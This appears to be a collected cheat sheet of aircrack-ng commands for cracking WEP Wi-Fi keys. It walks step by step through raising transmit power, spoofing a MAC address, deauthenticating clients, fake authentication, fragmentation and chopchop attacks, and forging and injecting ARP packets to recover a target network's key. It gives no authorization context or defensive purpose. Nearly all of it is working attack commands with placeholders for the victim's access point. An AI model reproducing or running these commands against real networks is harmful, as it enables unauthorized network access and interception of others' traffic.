aireplay-ng -3 -b "AP MAC" wlan0 aireplay-ng -1 0 -e "AP NAME" -a "AP MAC" wlan0 aireplay-ng -0 10 -a "AP MAC" -c "CL MAC" wlan0 aircrack-ng -s -b "AP MAC" output*.cap EDIT: First enable high power on your awus036h to make it inject over even great er distances: (using r8187 driver) modprobe -r rtl8187 modprobe r8187 iwpriv wlan0 highpower 1 iwconfig wlan0 txpower 27 Now bring it up in monitor mode and follow the steps below. 1 - Start airodump on the correct channel/bssid: airodump-ng -c CHANNELAP --bssid BSSIDAP -w dlink wlan0 2 - Try the fragmentation attack first, and if succesfull; it will always give y ou a 1500 bytes XOR file: ( you might have to try a few different packets before it will work ) aireplay-ng -5 -b BSSIDAP -r dlink-01.cap wlan0 3 - If fragmentation doesn't work, try chopchop instead, but keep this in mind: If you use a XOR file obtained from a chopchop attack, be sure it is at least 14 4 bytes long! Which means you should select a packet from the AP to chopchop tha t's at least 144 bytes, so it will result in a 144 bytes XOR file: (keystream) aireplay-ng -4 -b BSSIDAP -r dlink-01.cap wlan0 4 - Once you get a valid XOR file, from either chopchop or fragmentation, and it 's equal or bigger than 144 bytes, you can use it for fake Shared Key Authentica tion: aireplay-ng -1 0 -a BSSIDAP -y NAMEOFXORFILE.xor wlan0 5 - If authentication is succesfull, it's time to forge an ARP packet: packetforge-ng -0 -a BSSIDAP -h YOURCARDSMAC -k 255.255.255.255 -l 255.255.255.2 55 -y NAMEOFXORFILE.xor -w arp 6 - Inject your forged ARP packet: aireplay-ng -3 -b BSSIDAP -r arp wlan0 7 - IV/data rate goes up in airodump, so you can now crack the key with aircrack : aircrack-ng dlink*.cap 00:1E:58:9B:37:7c NOTES These are all different colors because they coordinate with parts of the code yo u will have to change when typing them. wlan0 = Interface (Examples: wlan0, ath0, eth0) ch = The channel the target is on (Examples: 6, 11) bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2) ssid = Name of target (Examples: linksys, default) filename = Name of .cap file (Examples: wep123, target, anythingyoutwant) fragment-*.xor= The * being replaced by a number (Examples: fragment-25313-0123.xor) PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21) Ignore : ------------------------------------------------------------------------- WEP CRACK GUIDE 1. Boot computer with Backtrack 4 (login: root , pass: toor / poweroff at end) 2. Open Konsole and type the following: 3. airmon-ng (You will find your Interface here) 4. airmon-ng stop wlan0 **My interface is wlan0. It may be yours also. Replace a ll the wlan0 with your own interface!** 5. ifconfig wlan0 down 6. macchanger --mac 00:11:22:33:44:55 wlan0 7. airmon-ng start wlan0 8. airodump-ng wlan0 9. Hit CTRL+C after finding WEP wanting to crack, then COPY THE BSSID 10. airodump-ng -c (ch) -w (file name) --bssid (bssid) wlan0 11. Open new Konsole and type the following: 12. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0 13. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0 14. Open new Konsole and type the following: 15. aircrack-ng -b (bssid) (file name)-01.cap ------------------------------------------------------------------------- ALTERNATE ATTACKS FRAGMENTATION 1. After step 11 in the WEP CRACK GUIDE, type the following: 2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan 0 3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0 4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.2 55.255.255 -y fragment-*.xor -w arp-packet 5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0 6. aireplay-ng -2 -r arp-packet wlan0 7. aircrack-ng -b (bssid) (file name)-01.cap CHOPCHOP 1. After step 11 in the WEP CRACK GUIDE, type the following: 2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan 0 3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0 4. Repeat steps 4-7 in the FRAGMENTATION ATTACK **Be sure to open new Konsoles when necessary** http://forum.aircrack-ng.org/index.php?topic=7430.0 http://www.enigmagroup.org/articles/view/WiFi%20Hacking/2-How-to-crack-WEP